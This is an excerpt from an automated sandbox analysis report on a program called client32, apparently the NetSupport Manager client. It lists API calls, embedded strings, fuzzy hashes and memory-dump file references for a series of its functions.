                                                                                                                                                    • API ID: ByteCharMultiWide$__strdup_malloc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2291067320-0
                                                                                                                                                    • Opcode ID: 6da951efbfc87db6ece2d1a25a630200d6c073fb490d851d412b640ddb2e2f8a
                                                                                                                                                    • Instruction ID: ca87d18320adad33a834d8cb277fb2ace37061aefdd10bcd2fd950a8e6c1b163
                                                                                                                                                    • Opcode Fuzzy Hash: 6da951efbfc87db6ece2d1a25a630200d6c073fb490d851d412b640ddb2e2f8a
                                                                                                                                                    • Instruction Fuzzy Hash: C031C271A04309BFD7108F69CC49FABBBB9EF46714F14C156F945AB280D670AD09CB90
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 110CEDF0: EnterCriticalSection.KERNEL32(00000000,00000000,1EF76653,00000000,00000000,00000000,110CF110,?,00000001), ref: 110CEE2A
                                                                                                                                                      • Part of subcall function 110CEDF0: LeaveCriticalSection.KERNEL32(00000000), ref: 110CEE92
                                                                                                                                                    • IsWindow.USER32(?), ref: 110CF82B
                                                                                                                                                      • Part of subcall function 110CC330: GetCurrentThreadId.KERNEL32 ref: 110CC339
                                                                                                                                                    • RemovePropA.USER32(?), ref: 110CF858
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 110CF86C
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 110CF876
                                                                                                                                                    • DeleteObject.GDI32(?), ref: 110CF880
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DeleteObject$CriticalSection$CurrentEnterLeavePropRemoveThreadWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1921910413-0
                                                                                                                                                    • Opcode ID: e7ee2ccd0990f0a239e7a4ad568e4e99a575b0a85c9cc50c84e6834965f63a82
                                                                                                                                                    • Instruction ID: ad97ac124b8baf06b1bc187428558142c09e0612fd1a0aa1ed86d22d24e6cfad
                                                                                                                                                    • Opcode Fuzzy Hash: e7ee2ccd0990f0a239e7a4ad568e4e99a575b0a85c9cc50c84e6834965f63a82
                                                                                                                                                    • Instruction Fuzzy Hash: 0C316BB1A007559BDB20DF69D940B5BBBE8EB04B18F000A6DE862D3690D775E404CBA2
APIs
Strings
• ..\CTL32\DataStream.cpp, xrefs: 1108165E
• %02x, xrefs: 11081610
• m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}, xrefs: 11081647
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: wsprintf
• String ID: %02x$..\CTL32\DataStream.cpp$m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}
• API String ID: 2111968516-476189988
• Opcode ID: 18afd0e97f3a031e40cfd2a551fc180182996eee7e6a41f22d48f02a6a494389
• Instruction ID: 5a57582845b686d446ddd06a6d519ab032a036b4d7a2f4ef603709a16adc2e93
• Opcode Fuzzy Hash: 18afd0e97f3a031e40cfd2a551fc180182996eee7e6a41f22d48f02a6a494389
• Instruction Fuzzy Hash: 8621F371E412599FDB24CF65DDC0EAAF3F8EF48304F0486AEE51A97940EA70AD44CB60
APIs
  • Part of subcall function 1111AAA0: DeleteObject.GDI32(?), ref: 1111AAD6
• SelectPalette.GDI32(?,?,00000000), ref: 1111F4BC
• SelectPalette.GDI32(?,?,00000000), ref: 1111F4D1
• DeleteObject.GDI32(?), ref: 1111F4E4
• DeleteObject.GDI32(?), ref: 1111F4F1
• DeleteObject.GDI32(?), ref: 1111F516
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: DeleteObject$PaletteSelect
• String ID:
• API String ID: 2820294704-0
• Opcode ID: 49a3d47807c6f92d38608e4a3b8e2f849b62ff86fa01972e32864b9cc0c423b5
• Instruction ID: f40c181d7eb29f9f1a68c60cce03c48cde81027a9113fa9449142c78dfeb9332
• Opcode Fuzzy Hash: 49a3d47807c6f92d38608e4a3b8e2f849b62ff86fa01972e32864b9cc0c423b5
• Instruction Fuzzy Hash: 7B219076A04517ABD7049F78D9C46AAF7A8FB18318F11023AE91DDB204CB35BC558BD1
APIs
  • Part of subcall function 11034C90: EnumWindows.USER32(Function_00034A20), ref: 11034CAB
  • Part of subcall function 11034C90: SetForegroundWindow.USER32(?), ref: 11034CB5
  • Part of subcall function 11034C90: EnumWindows.USER32(Function_00034A20), ref: 11034CDF
  • Part of subcall function 11034C90: Sleep.KERNEL32(00000032), ref: 11034CE9
• Sleep.KERNEL32(00000032,LegalNoticeText,?,?,LegalNoticeCaption,?,?,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System,00020019), ref: 1104F191
• GetLastError.KERNEL32(00000000,Global\Client32Provider,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System,00020019), ref: 1104F1DF
• Sleep.KERNEL32(00000032,?,?,0000004A,00000000,?), ref: 1104F33D
• Sleep.KERNEL32(00000032), ref: 1104F383
Strings
• error opening ipc lap %d to logon, e=%d, %s, xrefs: 1104F1E7
• Global\Client32Provider, xrefs: 1104F1BB
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Sleep$EnumWindows$ErrorForegroundLastWindow
• String ID: Global\Client32Provider$error opening ipc lap %d to logon, e=%d, %s
• API String ID: 3682529815-1899068400
• Opcode ID: c4d977c9ff5073cf5f339a6a763244f2db9b90aa9ebb7fa690a9d42cd1b1b4cf
• Instruction ID: 6aab5bd338832a8b6cc9a825996d00e4c24ed17e7d33d91b3ba03cdb4d861036
• Opcode Fuzzy Hash: c4d977c9ff5073cf5f339a6a763244f2db9b90aa9ebb7fa690a9d42cd1b1b4cf
• Instruction Fuzzy Hash: BC212638D4425ACED715DBA4CD98BECB760EB9630AF2001FDD85A97590EF302A45CB12
APIs
• _malloc.LIBCMT ref: 11163972
  • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
  • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
  • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
• _free.LIBCMT ref: 11163985
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: AllocateHeap_free_malloc
• String ID:
• API String ID: 1020059152-0
• Opcode ID: 038951e35deccbe33e424bc6d0b6b01cb88aea4f76c9cdef2cbfb9def4edf244
• Instruction ID: 99a0502aaeb7ade96a4deef53194f79690bd7c081ca6f8299ad08a7ab0eaa67e
• Opcode Fuzzy Hash: 038951e35deccbe33e424bc6d0b6b01cb88aea4f76c9cdef2cbfb9def4edf244
• Instruction Fuzzy Hash: 6D110837618637AADB121B74A808649FB9CAF843F8B214126E85D96140FEB2D460CF90
APIs
• EnterCriticalSection.KERNEL32(0000002C,?,?,00000000,?,1104362F,?,?,?), ref: 110B395F
• LeaveCriticalSection.KERNEL32(0000002C,?,?,00000000,?,1104362F,?,?,?), ref: 110B397E
• GetSystemMetrics.USER32(0000004C), ref: 110B39A7
• GetSystemMetrics.USER32(0000004D), ref: 110B39AD
• LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,1104362F,?,?,?), ref: 110B39DB
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CriticalSection$LeaveMetricsSystem$Enter
• String ID:
• API String ID: 4125181052-0
• Opcode ID: b61a3752badfb56f32cfb2deb03944f9272f81fb0acc9150a138a5a10ab5b813
• Instruction ID: 2eabc0a5c64141517199ab689f696fc8c069b56ecca888d5095ec5d0d1156609
• Opcode Fuzzy Hash: b61a3752badfb56f32cfb2deb03944f9272f81fb0acc9150a138a5a10ab5b813
• Instruction Fuzzy Hash: 6F11B132600608DFD314CF79C9849AAFBE5FFD8314B20866ED51A87614EB72E806CB80
APIs
• __getptd.LIBCMT ref: 6CAA6D0A
  • Part of subcall function 6CAA6F64: __getptd_noexit.LIBCMT ref: 6CAA6F67
  • Part of subcall function 6CAA6F64: __amsg_exit.LIBCMT ref: 6CAA6F74
• __getptd.LIBCMT ref: 6CAA6D21
• __amsg_exit.LIBCMT ref: 6CAA6D2F
• __lock.LIBCMT ref: 6CAA6D3F
• __updatetlocinfoEx_nolock.LIBCMT ref: 6CAA6D53
Memory Dump Source
• Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
• Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
Yara matches
Similarity
• API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
• String ID:
• API String ID: 938513278-0
• Opcode ID: 619e77e11d83499253cd74d4f7745032b57662a38278548b034a5566e3ea2f3b
• Instruction ID: 1700565f9dbfdcb8caf2f0c3ce8a1bcf3655a3d24f7e0dbc5607fe8e04ad2515
• Opcode Fuzzy Hash: 619e77e11d83499253cd74d4f7745032b57662a38278548b034a5566e3ea2f3b
• Instruction Fuzzy Hash: 0AF06D32A05B109BDA15AFFC5A0278E77A0AF0476DF10860DE554E7BC0DB2489CBCE56
APIs
• __getptd.LIBCMT ref: 11171312
  • Part of subcall function 1116C675: __getptd_noexit.LIBCMT ref: 1116C678
  • Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685
• __getptd.LIBCMT ref: 11171329
• __amsg_exit.LIBCMT ref: 11171337
• __lock.LIBCMT ref: 11171347
• __updatetlocinfoEx_nolock.LIBCMT ref: 1117135B
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
• String ID:
• API String ID: 938513278-0
• Opcode ID: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
• Instruction ID: 9cb08520484339131e966c5afe67267813abc49f95b778b0e1eea255b6adbda5
• Opcode Fuzzy Hash: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
• Instruction Fuzzy Hash: 67F0243AD04322DAE7119BB88801B5CF7A16F0073CF110249D814A77C0CFA47810CB5B
APIs
  • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
  • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
  • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
  • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
  • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
  • Part of subcall function 11145410: GetSystemMetrics.USER32(0000005E), ref: 1114542A
  • Part of subcall function 110CC360: GetDlgItem.USER32(00000000,?), ref: 110CC387
  • Part of subcall function 110CC360: GetWindowRect.USER32(00000000), ref: 110CC38A
  • Part of subcall function 110CC360: MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 110CC39C
  • Part of subcall function 110CC360: MapDialogRect.USER32(00000000,?), ref: 110CC3C8
  • Part of subcall function 110CC360: GetDlgItem.USER32(00000000,?), ref: 110CC401
  • Part of subcall function 110CC360: SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000010), ref: 110CC41C
  • Part of subcall function 110183B0: GetSystemMetrics.USER32(0000005E), ref: 110183BF
  • Part of subcall function 110183B0: GetSystemMetrics.USER32(00002003), ref: 110183DF
• std::exception::exception.LIBCMT ref: 11053483
• __CxxThrowException@8.LIBCMT ref: 11053498
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Window$ItemMetricsRectSystem$DialogException@8ObjectPointsShowTextThrowstd::exception::exception
• String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
• API String ID: 2181554437-3415836059
• Opcode ID: 1accb0bbb03bc77863436f13e3d15f929dc8c171c4ae25107a4f7bd902e08966
• Instruction ID: 43705d0265472f43c13063854f38501adaeacc0369148bb5472ef3ca99b46591
• Opcode Fuzzy Hash: 1accb0bbb03bc77863436f13e3d15f929dc8c171c4ae25107a4f7bd902e08966
• Instruction Fuzzy Hash: 1E519375E00209AFDB45DF94CD81EEEF7B9FF44308F108569E5066B281EB35AA05CB91
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountTick
                                                                                                                                                    • String ID: General$TicklePeriod
                                                                                                                                                    • API String ID: 536389180-1546705386
                                                                                                                                                    • Opcode ID: 583a630acb21db53e34cc03cdf69896ea0eaf712d7d07d60b781f99cd72e8e82
                                                                                                                                                    • Instruction ID: df9d0f281d17993452c850789e07539b87313039e6a264bd0b80c81d914ed6ef
                                                                                                                                                    • Opcode Fuzzy Hash: 583a630acb21db53e34cc03cdf69896ea0eaf712d7d07d60b781f99cd72e8e82
                                                                                                                                                    • Instruction Fuzzy Hash: FE516234A00705DFE764CF68C994B9AB7E9FB44300F1085AEE55A8B381EB71BA45CB91
APIs
  • Part of subcall function 6CA9DBD0: _malloc.LIBCMT ref: 6CA9DBE9
  • Part of subcall function 6CA9DBD0: wsprintfA.USER32 ref: 6CA9DC04
  • Part of subcall function 6CA9DBD0: _memset.LIBCMT ref: 6CA9DC27
• std::exception::exception.LIBCMT ref: 6CA90D9C
• __CxxThrowException@8.LIBCMT ref: 6CA90DB1
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
• Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
Yara matches
Similarity
• API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
• String ID: DATA$NAME
• API String ID: 1338273076-4000142801
• Opcode ID: a2dc08d47f98f0640ab0a6d1dbb324135d22b178374bb1bbe6ede2ad68686a6f
• Instruction ID: 65f56cd3b82dc085f1f0e7a0fffd753f0978376b6f23d06b1fb843274e1980b9
• Opcode Fuzzy Hash: a2dc08d47f98f0640ab0a6d1dbb324135d22b178374bb1bbe6ede2ad68686a6f
• Instruction Fuzzy Hash: 2E411AB1D112499FDB04CFE5D981AEEFBF4FB08204F14452EE416A7640EB345A49CB51
APIs
• GetWindowLongA.USER32(?,000000F0), ref: 11077511
• CopyRect.USER32(?,00000004), ref: 1107753F
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
Strings
• m_hWnd, xrefs: 110774FE
• e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110774F9
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
